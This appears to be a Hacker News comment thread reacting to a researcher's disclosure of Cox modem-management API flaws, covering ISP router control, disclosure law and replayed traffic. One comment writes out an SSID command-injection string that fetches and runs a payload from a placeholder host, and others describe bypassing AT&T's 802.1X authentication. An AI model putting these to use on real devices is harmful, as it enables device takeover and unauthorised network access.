What a great article. Very easy to follow. The best part was that instead of attacking the messenger and denying any problem, Cox seem to have acted like the very model of responsible security response in this kind of situation. I'd love to read a follow up on what the bug was that intermittently permitted unauthorised access to the APIs. It's the kind of error that could easily be missed by superficial testing or depending on the reason behind the bug, perhaps not even experienced in the test environment.
What sucks about this situation is when your ISP forces you to use their modem or router. For example, I have AT&T fiber and it does some kind of 802.1X authentication with certificates to connect to their network. If they didn't do this, I could just plug any arbitrary device into the ONT. There are/were workarounds to this but I don't want to go through all those hoops to get online. Instead, I ended up disabling everything on the AT&T router and have my own router that I keep up to date plugged into that. Unbeknownst to me, the AT&T router could be hacked and I would never notice unless it was adversely affects my service.
Thank god most things use HTTPS these days.
If you have the att fiber with the ONT separate from the modem, it's really easy to bypass 802.1X. Plug an unmanaged switch in between the modem and the ONT; let the modem auth; disconnect the modem. You'll likely need to do that again if the ONT reboots, but at least for me, ATT a UPS for the ONT, so reboot frequency should be low.
Personally, I built up a rube goldberg of software and hardware with bypass nics so if my firewall was off (or rebooting), traffic would flow through their modem, and when it was on, my firewall would take the traffic and selectively forward traffic through from the modem, but there's really no need for that when you just use an unmanaged switch. I can find the code if you're interested (requires FreeBSD), but you sound more sensible than that ;)
How does that bypass 802.1x? Are the 802.1x packets are responded to by the official modem still? I was under the impression all packets were encrypted or signed with 802.1x, but Ive never had to implement or test it so I could be wrong.
802.1x is a secure login procedure, and then the port is open until link is dropped. There's no encryption or authentication per packet (it would be way too expensive), and if you put a switch between the ont and the modem, when you disconnect the modem, the ont doesn't see the link drop.
Managed switches or software ethernet bridges don't always propigate 802.1x packets, but unmanaged switches don't care.
There's no encryption or authentication per packet (it would be way too expensive) […]
It is possible to tie together 802.1X and MACsec, and plenty of (Ethernet) chipsets can do MACsec at wire speed, even up to 400G and 800G:
* https://www.arista.com/assets/data/pdf/Datasheets/7800R3_MAC...
* https://www.juniper.net/us/en/solutions/400g-and-800g.html
I don't know the telco space well enough to know if there's a MACsec-equivalent for GPON, but given the 'only' 25G speeds involved I doubt it would be much of a challenge.
If you have a router running PfSense Plus* and at least 3 ports, Netgate actually has pretty detailed instructions for how to do the bypass with their layer 2 routing feature. It sounds a bit complicated, but I followed along exactly as it says and it just worked for me. Has been 100% reliable for almost 2 years, and I get significantly better speed (something like 10-20% vs the built in "passthrough" mode on the gateway, iirc). Plus I managed to cut the suspicious DNS server the gateway tries to interject out of my network.
https://docs.netgate.com/pfsense/en/latest/recipes/authbridg...
There's another method that doesn't require Plus called pfatt, but I'm not sure what the state of it is.
* Plus is the paid version, yeah I know I agree I don't like what they did with the licensing changes but that's a different story
That's a good idea, I do have an extra UPS/switch I can use for this. In the past when I was a bachelor and had more free time, I used to run my own FreeBSD server with pf and other services running in jails. Now that I am settled down, I just want to make things as idiot proof as possible in case there is an Internet issue at home and another family member needs to fix it.
The XGS-PON workaround that DannyBee looks promising though:
https://pon.wiki/guides/masquerade-as-the-att-inc-bgw320-500...
I probably could pay to upgrade my speed to 2Gbps and then downgrade it back to 1Gbps and keep the XGS-PON.
The CPE AT&T router potentially getting hacked doesn't make much difference if you have your own router between your network and the AT&T network. Even if we removed the AT&T CPE router, you'd still be connecting to a black box you don't control that could be hacked or doing any number of inspections on your traffic.
It does matter since it lets an attacker be between your network and the internet. If that black box is a modem- yes it could be hacked, but (maybe luckily for me) the providers I've used don't expose many services from the modem on the public interface so it's much more difficult to compromise. You'd either have to come from the docsis network or the client network.
But remove the CPE router. Where do you think that fiber goes? To "the internet"? It's going to yet another box owned and managed by your ISP. And from there, probably yet another box owned and managed by your ISP. And then another black box maybe owned by yet another ISP, and then another black box owned by maybe yet another ISP. Each one of these could let an attacker come between your network and "the internet". You have no control over them. You don't patch them, you don't configure them, you have no say over the services running on them. If they're compromised, you likely wouldn't know.
The CPE just moves the first black box inside your home, but there's always some ISP black box you're connecting to. Even if you're a top tier network, it's not like you control every box between you and every other site you want to go to. You're going to eventually have some handoff at some peering location, and once again your traffic goes to a box you don't control just waiting for an attacker to manipulate and mess with your traffic.
The CPE also moves the first black box under foreign control to (potentially) both sides of your firewall, as most small businesses likely just use the router in that mode, and have very little networking knowledge. That's significantly worse than somewhere on the outside of your firewall because now it can snoop pretty much everything and be used to scan the local network which is often poorly protected because it's assumed to be pretty secure.
Hence my first comment:
doesn't make much difference if you have your own router between your network and the AT&T network
And in the end those businesses with no networking knowledge will end up using their ISP's CPE modem/router/WiFi combo regardless of if its required or not. And from my experience it is not even just AT&T requiring their CPE router somewhere in the stack. I previously managed a Spectrum DOCSIS business internet connection where they also required their owned and managed gateway in the stack in order to have any static IP addresses. They wouldn't support any other configurations.
That's why I'm not an AT&T customer. Spectrum lets me bring my own hardware, and they're the only other option in my area, so Spectrum gets my business. Plain and simple. Unfortunately, not everyone has the palatable solution that I have.
Spectrum remote manages your hardware even if you bring your own modem. This nearly entirely consists of deploying firmware updates once a decade, but they can also command other things like modem reboots.
If it's your own hardware, what's stopping you from closing the port they connect to?
How do you propose blocking a port between the cable network and your modem? You'd have to build your own custom firmware that doesn't acknowledge upstream firmware update requests.
AFAIK, they can/will kick you off the network if your modem is running unverified firmware. I think this is a regulatory requirement, but don't take my word for it. They don't want anyone to have free access to the network, you could do things like spoof your MAC address to get free service. I'm sure you could also do something much more malicious like crash parts of the network.
DOCSIS?
Always put your own router in-between.
If you really care you can configure a VPN directly on the router, so nothing leaves the network unencrypted.
Like someone else mentioned, at some level you need to rely on your ISP and it is also a good idea to have a router in between anyway.
I would like to bypass the BGW320 because not only it is a large, power hungry box, but it also requires me to jump through hoops to get IPV6 working with VLANs. I need to either use multiple physical links (simulating multiple devices) or simulate that using a VRRP hack, otherwise AT&T will not give out multiple ranges at all (and will not care about what I request). Under Comcast I didn't have to do any of that, I'd just carve out smaller IPV6 ranges, as many as needed.
Fortunately, Cox isn't one of these. Any sufficiently modern DOCSIS modem, appropriate to the speed of service you subscribe to, is accepted.
Unfortunately, my praise of Cox ends there. I've been having intermittent packet loss issues for 2 years, and there doesn't appear to be a support escalation path available to me, so I can't reach anyone that will understand the data I've captured indicating certain nodes are (probably) oversubscribed.
It was mentioned by a sibling, but there are ways to connect without using one of AT&T's gateway devices. Different methods are catalogued on https://pon.wiki/
Fwiw: the hoops are automated these days if you are on xgspon.
It's "plug in sfp+, upload firmware using web interface, enter equipment serial number"
You can even skip step 2 depending on the sfp stick you use.
The 802.1x state is not actually verified server side. The standard says modems should not pass traffic when 802.1x is required but not done. Most do anyway or can be changed to do so. AT&T side does not verify, and always passes traffic. That is what is happening under the covers.
An open question is still: how were the attackers able to grab his HTTP traffic?
Some CPEs have a cloud Wireshark-like capability for debugging. I'm not sure if those are even on the Cox production firmware images. Usually there's a set of firmware for production and a set for test (which obviously makes it hard to test for problems in production).
I suppose Cox could do a check to see what firmware versions are out there. ISPs can auto-upgrade firmware that doesn't match a specific firmware revision, and this was a Cox modem so they probably have firmware for it. So if it was a debug firmware how did it get there and survive?
also, yet another reason I don't trust (and don't use) any ISP provided equipment. Remote administration from my ISP? No thank you.
Even if you buy your own modem they can push firmware to it (and do). The config file your modem downloads includes a cert that allows the isp to do this. You can flash special firmware (used to be called force ware) to prohibit this.
Is it safe enough to buy a separate router and put the ISP modem on the "internet" side of it?
It depends. The tr069 managed devices are typically router wifi combo type devices. If you can get a dumb modem that would would likely remove any tr069 vulnerabilities.
The firmware on whatever is doing docsis is going to be updatable by the ISP generally.
Two different mechanisms. The tr069 management and snmp triggered firmware upgrade
I think the attack described in the article is still possible in this setting, where the modem is in the middle of your unencrypted http traffic. This is true of any equipment belonging to the isp
However, I would assume no unencrypted traffic is safe anyway, and the modem would indeed not have access to your internal network.
How about putting the ISP supplied modem in a DMZ? Then the ISP could admin it all they want but still never touch the LAN.
So open it up to anyone? DMZ is an open target, not what you want to be doing.
It’s more about protecting your network against a potentially malicious device rather than protecting the device from attackers on the Internet. From that position, placing the isp device on a “DMZ” aka outside your own router/firewall, makes perfect sense.
That's pretty much the way to go. Keep the ISP modem, but connect it to your own router/firewall and connect your devices to your hardware and not the ISP modem.
I get the perspective, but I also like the fact that ISPs do take over some of the admin burden associated with running a piece of equipment like a router.
You, I and most of the HN crowd may be well capable of maintaining a reasonably secure state of our own hardware and troubleshoot our way through common errors. However, the average internet user isn’t that experienced nor are most people interested in learning those skills.
I have a feeling the OP ... has the skills to manage his router :)
but point well taken in general.
Its HTTP not HTTPS, anyone or anything on the wire could see the request
That's the part I didn't get. The author said there was no other possibility except the modem, but why? It seems like quite a leap. I would have first suspected a compromised router on the internet. Is it possible that changing the modem caused new routes to be used which appeared to fix the problem?
Of all the routers along the route, the one most likely to be compromised is obviously the piece of plastic guano your ISP forces you to use
If you create a socket with PF_PACKET you can intercept all the traffic on a Linux system on all interfaces. Think of a low-tech version of tcpdump.
Intercept all data on port 80, parse the http headers, do whatever you need with them, easy.
Not sure why anybody would replay the requests though.
Holy hell, but how are your laws in the US aligned so doing something like this is okay?
In Germany you would get minimum 3 years in jail for this, people got in front of court for way way way way less.
For the researcher? Because the vendor has a responsible disclosure program. Because they'd rather know about the bugs.
(As for the vendor, I'm sympathetic to the argument that there should be vendor liability under some circumstances.)
In Germany it is common for vendors to acknowledge the security flaw you send to them, but if you want to publish it (and damage their reputation by doing so) they are going to try you in court, and win.
Sometimes they even try you in court if you don't publish it (yet)
To be fair, Germany is unusually harsh on security researchers. As far as I know (but German law is not my forte) there's no exclusion for "ethical hacking". I remember reading about many German cases that went like:
* A security researcher discovers that the main database of some service is available publicly with default password * They notify the company * They get sued for unauthorized access to the company's data
This wouldn't happen in my (also European) jurisdiction, because as long as your intention is to fix the vulnerability you found, and you notify the company about the problem, you're in the clear.
That's why I would never do this Kind of research from my home Internet and don't send any responsible disclosure from my private email.
There is no reason to give any information but details about the security issue...
Regarding Germany and large corporations, and somewhat of a tangent, I remember a decade ago a bunch of hedge funds had tried to sue Porsche, the parent company of VW, for cornering the market for VW’s open interest and cause the mother of all short squeezes.
They tried the case in New York but it got thrown out for lack of jurisdiction. They did try the case in Germany, but Porsche had fittingly cornered the market for the best and biggest law firms. All of the best law firms refused to take the case because it would mean that they’d be essentially blacklisted by the largest companies in Germany for bringing a case against a German company.
It’s taken a decade, but I now see a pattern.
This seems like awful law. Is there any movement to rectify the situation?
Cox has a responsible disclosure program: https://www.cox.com/aboutus/policies/cox-security-responsibl....
In my opinion (as a security engineer) the biggest benefit of such programs is not amoral "hackers will always sell exploits to the highest bidder so companies must provide a high bounty for bugs in their software"[1] but "having a responsible disclosure process makes it totally clear that it's ok to report vulnerabilities without being sued".
Looking at the timeline below the post I can't see anything problematic. The author even waited the usual[2] 90 days before disclosure, even though the vulnerability was hotpatched a day after report (congrats to Cox btw). They also shared a draft blog post with them a month ago.
[1]They certainly should, in the ideal world.
[2]A deadline popularized (or even invented) by Google's project zero.
Yeah when a company says one of their responsible disclosure rules amounts to "just don't ruin our prod system, or reveal or steal data pls" they basically invite you to try and break in - responsibly.
In Germany you would get minimum 3 years in jail for this, people got in front of court for way way way way less.
Great way to make sure researchers don't notify the victim of vulnerabilities, but rather stay quiet or sell it.
You'll note they never tried to change anything but their own equipment; doing otherwise would have been immoral and, yes, likely illegal. Without testing you have no idea whether or not you're actually looking at something that needs to be reported.
Germany is an outlier, not the norm, when it comes to security research
You should advocate for laws that enable security research.
i'm really glad that i can use my own modem. In germany every ISP is by law required to accept self brought modems. They can't force you to use their often shitty hardware. My current modem/router is up for 3 months without a single interruption to my connection.
Can the ISP load firmware onto your modem? I'm on Cox in the US (same ISP as in TFA) and you can bring your own modem, but Cox will remotely update the firmware.
Not really as far as I know. Providers in Germany have more or less standardized on Fritz!Box from AVM and the router comes with the admin password available. Updates are then fetched from upstream AVM.
But the key point here is device independence - by law, providers need to give you all information required to establish a connection to them. This allows you to run a Linux or BSD box as a router should you wish to. It somehow makes up for the slow broadband speeds you can get.
*Edit: complaints about slow broadband speeds
Are there Linux or BSD boxes with ADSL or DOCSIS physical layers present? I use a separate modem and router, as do most people in the US that are not renting equipment from their ISP.
No, they can't. They don't have any access at all to your device. But as jeduardo already said, you can fetch updates from the device manufacturer. The mentioned Fritz!Box from AVM has automatic updates and is known for delivering them for a really long time. My 12 year old repeater from that brand is still receiving security updates from time to time.
I've noticed it gets quite murky when dealing with fibre-to-the-premises, particularly in the UK. Although I don't think an ISP would disallow BYOD, I imagine they'd just not be as likely to support it.
I recently moved ISP, partly because of cost, but also because they offered a great home router as part of their bundle. The installer could not utilise any of the existing wiring in my house, had to be all drilled a second time...
Conversely, my last ISP used some awful Nokia modem that barely supported any kind of routing or customisation and I picked them specifically because it was a rental and the fibre wiring had already been done.
It's fairly common for ISP's in Australia to also give you a choice of BYOD or buying one of theirs. Usually you pay outright for the modem, however, so its yours to keep. That said, this is changing with the national fibre roll-out. But with ADSL being the de-facto choice, BYOD makes sense.
With Aussie NBN most providers use pppoe or dhcp, which allows byod or ISP router.
FWIW, you can use your own modem and router with Cox internet, but most people don't because the provided modem is free and most people don't care to spend money on their own.
Cox can (and does) push firmware to bring-your-own modems, though.
What sort of authentication system just lets calls through randomly sometimes... The incompetence!
Discovered this in a vendor’s API. They registered the current user provider as singleton rather than per-request. So periodically you could ride on the coat-tails of an authenticated user.
This is ridiculously easy to do inside scripting languages like javascript
function foo(token: string) {}
function bar(token: string) {}
function baz(token: string) {}
// hmm, this is annoying
let token;
.get((req) => { token = req.data.headers.token }
function foo() {}
It is even possible to do it by "accident" with only subtly more complicated code! I constantly see secrets leak to the frontend because a company is bundling their backend and frontend together and using their frontend as a proxy. This lack of separation of concerns leads to a very easy exploit:
If I'm using, say, Next.js, and I want access to the request throughout the frontend, I should use context. Next even provides this context for you (though honestly even this is really really scary), but before my code was isomorphic I could just assign it to a variable and access that.
At least in regards to the scaryness of the next provided global context, at least now node has AsyncLocalStorage which properly manages scoping, but plenty of legacy...
The entire ecosystem is awful.
From my distrust in bundlers, I'm now fuzzing within CI for auth issues. Hitting the server 10k times as fast as possible from two different users and ensuring that there is no mixup. Also, scanning the client bundle for secrets. I haven't had an issue yet, but I've watched these things happen regularly and I know that this sort of test is not common
I once seen a bug in a Django App which caused similar issues. Basically the app often returned a HTTP no content for successful calls from AJAX requests. So someone had DRYed that by having a global NoContentResponse in the file. The problem was that at some point in the Django middleware the users session token got affixed to the response - effectively logging anyone from that point on in as another user.
In my experience this can be caused by a loadbalancer, for example not being able to route (properly) to servers in the pool or a difference in configuration/patch-level between them.
It could also be that a subset of origin servers that the requests being routed to were misconfigured.
The API was reverse proxied. Possibly a caching issue?
Found a similar big once. The API would correctly reject unauthenticated requests for exactly 10 minutes. Then, for exactly 1 minute, unauthenticated requests were allowed. The cycle repeated indefinitely. Would love to know what was going on on the backend...
One of the reasons to not be excited about ISP provided cable modems with WiFi functionality and to have good endpoint/service security on your LAN. (TLS, DNS over TLS at least accross the modem/ISP)
I just put it in bridge mode, disable wifi, and all network functionality is served by my own devices.
The last modem I rented from ISP, the ISP didn't bother with any firmware updates for ~10 years. It was rock stable because of that, though. :)
Routers are the most exploited IoT devices on the planet, often vulnerabilities in the router firmware persist for years without getting patched because most endusers don't patch their routers. The ISP having a way to play patches onto router and recall unpatchable ones (because they own them) is a net gain for cyber security.
But ISPs DON'T patch routers. Plenty of spectrum modems still run a decade old firmware
Yes, I agree that routers are key and critical.
Otherwise I would not be managing my own high quality one, based on the latest Linux kernel, and a standard, well supported and maintained software and carefully selected wifi HW with active manufacturer provided support.
I also would not be trying to isolate and disable most of the ISP provided HW/FW mess, if I believed otherwise. I don't trust ISP that did not upgrade their modem in 10 years, one bit with security of key entry point to my home network.
I just put it in bridge mode, disable wifi, and all network functionality is served by my own devices.
Same. Somehow I got them to install a simple modem, one without all of the router and access point features. I thought those single purpose devices didn't exist anymore.
Bought a relatively good router, installed OpenWRT on it then bridged it to the ISP's network via their equipment. It's working well. I even have HTTPS in my LAN now.
One interesting thing I found was that the newer Vodafone cable modem with 4 ethernet ports, after switching to bridge mode, assigns public IPv4 address to at most 1 network node connected to each wired port. So it's possible to get 4 stable public IPv4 addresses assigned to my home network and use them for whatever.
It's not a great idea to host services (especially if they can be used to identify you) on a home IP address you browse the internet with, and this is one way to get 1 IP address for browsing the net, and different 1 for serving services from home, pretty much for free.
Counterpoint: ISP with over 1M customers have the incentives of upgrading their HGW "forever" to reduce Capex. My employer (Free, French ISP also shipping HGW to Italia as Iliad) still upgrade their HGW released in 2011 (though if you have yours dating back from 2011, have it replaced (your oled screen is probably dead ;) to get more recent wifi cards). It runs a modern Linux 6.4. You get modern nifties like airtime QoS, got upgraded mobile apps if you wish, and uh lots of software features.
Why do y’all think the attacker was replying all of his requests? Could they be probing for unintentionally exposed endpoints themselves?
If it was a request to a bank, say, it could have included all the cookies and tokens that would allow the request to go through successfully, and the attacker would gain access to their bank page (though if it was something super high security, you'd hope it would have single use tokens and stuff)
A request to a bank that doesn't use TLS would be near-criminal negligence (by the bank) in itself.
If the request does use TLS, then even a compromised router should be unable to decrypt it. TLS is end-to-end encryption.
If the request doesn't use TLS, then the compromised router can already see the request and response that it is relaying. So why does it have to replay the request from somewhere else? It can just exfiltrate the session back to the attacker silently, without replaying it first.
==
If I had to guess, the attacker isn't sure what they're looking for in the HTTP sessions, so they can't push a detection for interesting sessions down to the compromised routers, and they also don't have the bandwidth to simply receive all unencrypted traffic from their router botnet, so instead they're collecting the URLs and building up a list of detection patterns over time through scanning and using heuristics for which requests are worth investigating, something like that?
That's a good guess.
Test systems often don't use HTTPS. Test systems often have credentials that work in production (even though they shouldn't), or are useful for finding vulnerabilities in production.
If they didn't have RCE but could push config to the router, they might have pushed a syslog destination and then mined the logs. URLs for uncrypted HTTP requests could end up in the logs due to ALG, parental filtering or any other numbers of features. If you replayed such URLs from a large enough set of victims over a long enough period of time, you'd find something valuable in a response sooner or later.
Along with the other stated reasons, it could be an attempt to cloak the IP as a normal residential IP by mirroring someone else's traffic
The intermittent auth thing in /profilesearch is a sign that they're round-robinning the servers and misconfigured one.
Also, it looks like he hit a front-end API that drives the TR-069 backend. Changing the WiFi SSID is a long way from being able to "...execute commands on the device"
Is changing the WiFi SSID not executing a command on the device? It isn't _arbitrary_ commands (yet), but it's definitely executing _a_ command.
That's not the kind of vulnerability that would have installed an exploit on their CPE.
Maybe, maybe not.
If the CPE is sufficiently poorly designed, it might be vulnerable to command injection attacks, so by changing the WiFi SSID to something like "'; wget http://bla/payload -O /tmp/bla; chmod +x /tmp/bla; /tmp/bla; #" you could execute a command on the device.
Alcatel's HH40V and HH41V as well as ZTE MF283+ LTE modems are a recent example I can remember where I got root SSH access by injecting commands from the admin WebUI.
It's impossible to say without knowing what commands were available.
This series of vulnerabilities demonstrated a way in which a fully external attacker with no prerequisites could've executed commands and modified the settings of millions of modems, accessed any business customer's PII, and gained essentially the same permissions of an ISP support team.
But the author agrees that this wasn't the vulnerability that allowed access to their own modem:
After reporting the vulnerability to Cox, they investigated if the specific vector had ever been maliciously exploited in the past and found no history of abuse (the service I found the vulnerabilities in had gone live in 2023, while my device had been compromised in 2021). They had also informed me that they had no affiliation with the DigitalOcean IP address, meaning that the device had definitely been hacked, just not using the method disclosed in this blog post.
Being able to change the SSIDs for thousands or millions of customers remotely within a few hours would definitely be written about as an “outage” for Cox though.
Did they *pay* him? He kind of saved them, tipped them off to a complete compromise of their security infrastructure which was not trivial to discover. Looks like he got nothing in return for "doing the right thing". How insulting is that? What is their perception of someone walking in to their offices with this essential information? I guarantee his self image and their perception are very different. They see an overly caffeinated attention seeking "nerd" just handed them a 300k exploit in exchange for a gold star and then they ran like smeg to cover their asses and take all the credit internally. He feels like superman, goes home to his basement apt, microwaves some noodles and writes a blogpost. This is a perfect example why you never, never report a 0day.
Its Cox, probably lucky if they don't sue him for fixing their mistake
It happens. This is the type of revelation where heads roll and a scapegoat is very useful for the CSO, general liability of the company and PR.
Sam is a very famous security researcher, so I would be shocked if he wasn’t making upwards of $350,000 a year. These articles he writes make him a significant amount of money via reputation boost.
Cox don't pay bounties.
> After reporting the vulnerability to Cox, they investigated if the specific vector had ever been maliciously exploited in the past and found no history of abuse
Would you trust a thing they say? It seems their whole network is swiss cheese.
this is why everything gets logged to an S3 bucket under an AWS account that has only write permissions and three people are required to break into the account that can do anything else with that bucket. I don't know if that's what Cox has, but that's how it's architect it to be able to claim there's no history of abuse.
That's how it should be architected, but the article shows that Cox's network gives no thought to security so it's unlikely how it is architected. Even if the Cox answer is correct to the best of their knowledge, we can't rule out that attackers are inside the network wiping out their logs.
You’re right, except I’d say that Cox gave some thought so security, but not enough. Which is in some ways even more dangerous than ignoring security entirely.
Great read, and fantastic investigation. Also nice to see a story of some big corp not going nuclear on a security researcher.
I can't say for certain, and the OP if they're here I'd love for you to validate this - but I'm not convinced requests to the local admin interface on these Nokia routers is properly authenticated. I know this because I recently was provisioned with one and found there were certain settings I could not change as a regular admin, and I was refused the super admin account by the ISP. turns out you could just inspector hack the page to undisable the fields and change the fields yourself, and the API would happily accept them.
if this is the case, and an application can be running inside your network, it wouldn't be hard to compromise the router that way, but seems awfully specific!
Cox is the largest private broadband provider in the United States, the third-largest cable television provider, and the seventh largest telephone carrier in the country. They have millions of customers and are the most popular ISP in 10 states.
That suggested to me that we shouldn't have ISPs that are this big. Cox is clearly a juicy target and a single vulnerability compromises, as an example from the article, even FBI field offices.
After reporting the vulnerability to Cox, they investigated if the specific vector had ever been maliciously exploited in the past and found no history of abuse
Feel like author should have written "...they claimed to have investigated...".
I think the author wrote it up factually. Readers can make their own inferences, but Cox did share with him that the service he exploited was only introduced in 2023. Which suggests the security team did do some investigating.
I'm sure* they don't keep raw request logs around for 3+ years. I know what next steps I'd recommend, but even if they undertook those, they're not sharing that in the ticket.
(just based on industry experience; no insider knowledge.)
The point is the statementay or may not be accurate. From a journalistic perspective, unless Cox provided evidence or the author was able to otherwise independently verify the claim, it's a claim, not a fact. The comment is a good suggestion.
> "...and found no history of abuse..."
Because they didn't have enough logging or auditing to start with, or no logs or audit data left since the hack.
from what I can gather from the post, the specific attack vector using "retry unauthorized requests until they are" is very easy to spot in logs. so even the most basic log policy that logs the path, ip, and status code is enough (i.e. default in most web servers and frameworks)
«Absence of evidence is not evidence of absence», seems to apply here.
Or they lied.
I mean, if you think about it from Cox's point of view — why would you disclose to someone outside the company if there had been history of abuse? Why would you disclose anything at all in fact?
page is now 404 :-/
Not from here?
Seems to have been a temporary hiccup, as I have no trouble accessing it.
It's easy to hate on big companies. But can we just applaud Cox for having patched this within a day? That's incredible.
To be honest I would be very surprised if this was Cox as an organization and not just one or two very passionate workers who understood the severity of the issue and stayed after hours fixing it for free.
Seems more like a configuration error. Load balancer balancing over a few hosts, one of them missconfigured. Most likely over 2 hosts given the 50/50 success ratio of the intruder test. If that’s the case then it’s easy to fix in such timeframe
Great writeup. There's just one thing I don't get: the auth part. It seems the author managed to access protected endpoints without any auth, by just repeating the same request over and over until the endpoint randomly accepted it. The part that confuses me is, how could that possibly happen? What possible architecture could this system have to enable this specific failure mode?
I struggle to think of anything, short of auth handling being a separate service injected between a load balancer and the API servers, and someone somehow forgot to include that in autoscaling config; but surely this is not how you do things, is it?
how could that possibly happen?
Global singleton shared across requests, instead of request scoped.
1. [Client 1/You] Auth/write to variable (failed).
2. [Client 2/ISP] Auth/write to variable (success).
3. Verify what the result was (success)
A race condition combined with a global singleton can easily explain such behavior.
Test server from early development put into production?
This is seems like a huge vulnerability, are there any legal repercussion that happens in those situations?
I hope not. Companies would close their responsible disclosure programs as a liability issue. Everything would be less secure because of such legal protections.
Many routers require manual firmware updates. GL.iNet routers had several RCE (Remote Code Execution) vulnerabilities within the last 6 months. I advise you to have a quick look in your own router to ensure its not hacked, and possibly upgrade firmware.
As a typical user the noticeable symptoms for me were: - internet speed noticeably slows down - WiFi signal drops and personal devices either don't see it, or struggle to connect. At the same time the router is still connected to the internet - router's internal admin page (192.168.8.1) stopped responding
I imagine many users haven't updated their routers and thus may be hacked. In my case the hacker installed Pawns app from IPRoyal, which makes the router a proxy server and lets hacker and IPRoyal make money. The hacker also stole system logs containing information about who and when they use the device, whether any NAS is attached. They also had a reverse shell.
Solution: 1. Upgrade firmware to ensure these vulnerabilities are patched. 2. Then wipe the router to remove the actual malware. 3. Then disable SSH access, e.g. for GL.iNet routers that's possible within the Luci dashboard. 4. Afterwards disable remote access to the router, e.g. by turning Dynamic DNS off in GL.iNet. If remote access is needed, consider Cloudflare Tunnel or Zero Trust or similar. There is also GoodCloud, ZeroTier, Tailscale, etc. I am not too sure what they all do and which one would be suitable for protected access remotely. If anyone has advice, I would appreciate a comment.
Consider avoiding GL.iNet routers. They do not follow principle of least privilege (PoLP) - router runs processes using root user by default. SSH is also enabled by default (with root access), anyone can try to bruteforce in (10 symbol password consisting of [0-9A-Z] and possibly might be more predictable). I set mine to only allow ssh keys rather than a password to prevent that. Despite running OpenWrt they are actually running their own flavor of OpenWrt. So upgrading from OpenWrt 21.02 to 23.05 is not possible at the moment.
"As a typical user the noticeable symptoms for me were: - internet speed noticeably slows down - WiFi signal drops and..."
Could also be the neighbours and their big microwave oven :)
No payout?
It can be inferred that the author is satisfied with that aspect of the transaction by their willingness to list things that they still felt unresolved at the end.
They either were paid and think it's nobody's business or weren't and have no ideological reason for making a stink. For what it's worth, I sympathize with people who feel shafted for their work by large companies, but think it is a little silly to go looking for it.
I see arguments in favour of tr069, but it's the mechanism that BT used to reboot my modem every night at 3am. I hate ISPs.
Modem FW probably had a memory leak :)
What were those fbi redacted things? Were those backdoors?
The above response contained the physical addresses of several FBI field offices who were Cox business customers.
That's literally just FBI's customer account at Cox.
Great read, I loved following your thought process as you kept digging.
At what point did you inform Cox about your findings? It doesn't sound like you were ever given the green light to poke at their management platform. Isn't work like this legally dubious, even if it is done purely in white-hat fashion?
Cox has a vulnerability disclosure program. https://www.cox.com/aboutus/policies/cox-security-responsibl...
Not trusting the modems we're given is a damn good reason to use a VPN, as opposed to the market bulsshsait the VPN companies usually propagate
Are there any creation of new laws or removal of hindering laws that would facilitate the fixing of these devastating security vulnerabilities?
One of the things I'll never understand was why the attacker was replaying my traffic? They were clearly in my network and could access everything without being detected, why replay all the HTTP requests? So odd.
I was thinking about this while reading. My guess is that the vulnerability was limited to reading incoming requests (to the modem) or something along those lines, not full control of the network. Replaying the requests is a good way to get both ends of the traffic if you can only access one. For instance, a login + password being authenticated. Just a thought!EDIT: I'd be hard-pressed to know how one could exploit this, given TLS would encrypt the requests. Maybe they're counting on using badly encrypted requests, encrypted with e.g. TLSv1.0?
It was so fun to read this. I am also surprised COX hot patched it within a day.
WARNING: nerd sniping. lol
Observation: The root of this problem is NOT because Cox's engineering practices lacked a comprehensive enough security review process to find and fix security vulnerabilities prior to them being discovered post deployment ("hindsight is always 20/20" as they say), but rather because there was (and still is) an Information Asymmetry between Cox and Cox's customers, i.e., in terms of complete knowledge of how Cox's devices actually work under the hood...
Although, in fairness to Cox, this Information Asymmetry -- also exists between most companies that produce tech consumer goods and most tech consumers (i.e., is it really a big deal if most other big tech companies engage in the same practices?), with the occasional exception of the truly rare, completely transparent, 100% Open Source Hardware, 100% Open Source Software company...
https://en.wikipedia.org/wiki/Information_asymmetry
Anyway, a very interesting article!
Great article, but unfortunately a determined threat actor would just go to the source and get a remote job as a Cox technician to gain access to millions of routers to add to their botnet. A real solution by the ISP would be to implement a software (or, preferably, hardware) setting that prevents remote access by default unless explicitly enabled by the customer. That approach would slow a social engineering campaign and limit the scope of a hack like this.
> there were about 700 different API calls..
That's more API endpoints than some first tier public clouds, wow. For a modem.
Somebody wanted (and sorta deserves) promo..
But also not, because the whole platform turned out to be incredibly insecure! Egregious!!!
I observed very similar behavior a few years back when transferring files between two servers under my control on different parts of a large university network.
We also initially thought we were the subject of a breach, but after the investigation we determined that the network's IDS was monitoring all traffic, and upon certain triggers, would make identical requests from external networks.
We found a way to identify all other similar IDSs across the internet and even "weaponize" this behavior. We ended up writing a paper on it: https://ian.ucsd.edu/papers/cset2023_fireye.pdf
Moral of the story - never turn on remote access on your modem.
I remember creating some webserver at work years ago, and I saw a router querying it. I warned the company admin.
Also, my wifi firmware occasionally crashes and needs to be restarted.
I don't work in cyber security or on anything sensitive, but if I was told I'm under surveillance by some government or some criminal, I would not be surprised.
It's unbelievable that Cox offers no compensation or reward for incredible work like this.
This reminded me to turn off "privacy settings" to "keep your vehicle in good condition and observe the vehicle's health" on my Volvo XC40 after the mechanics asked me to turn it on yesterday during the yearly maintenance. I don't know if they can change some settings remotely, but I prefer to be cautious
Replaying requests might be not a malicious attacker, but simply an ISP wishing to know and sell customer's interests.
Nightmare fuel. Giant tech company, giant vuln. There’s so much to say, but more than anything Im just upset. The article and this dude are amazing. The exploit is not excusable.
One of the things I'll never understand was why the attacker was replaying my traffic? They were clearly in my network and could access everything without being detected, why replay all the HTTP requests? So odd.
Did you determine if POSTs were replayed? As in, logging into accounts and sending payment info and account info?
> Authenticate your access patterns.
What does this mean?
Some CPE exposes an API on the LAN side, and some of these APIs aren’t protected against CSRF. I wonder whether the modem in question is vulnerable.
Wow! I just what a high a security researcher would feel while performing this research and keep finding open doors!
I wonder if it’s a mix of exhilaration and being terrified!
Another reason to not use ISP provided hardware. I have never had issues using my own OpenBSD box as a router.
Somehow, someone was intercepting and replaying the web traffic from likely every single device on my home network.
Normally I'd laugh and assume device compromise but...
The largest ISP in Australia (Telstra) got caught doing exactly this over a decade ago. People got extra paranoid when they noticed the originating IP was from Rackspace as opposed to within Telstra. Turned out to be a filter vendor scraping with dubious acceptance from customers. The ToS was quietly and promptly updated.
I love how well he explains it, even to someone like me who knows p much nothing about cybersecurity.
My bet on the replays was that the attacker misconfigured their payload or something and it was meant to replay command and control requests to obfuscate where the C2 server was
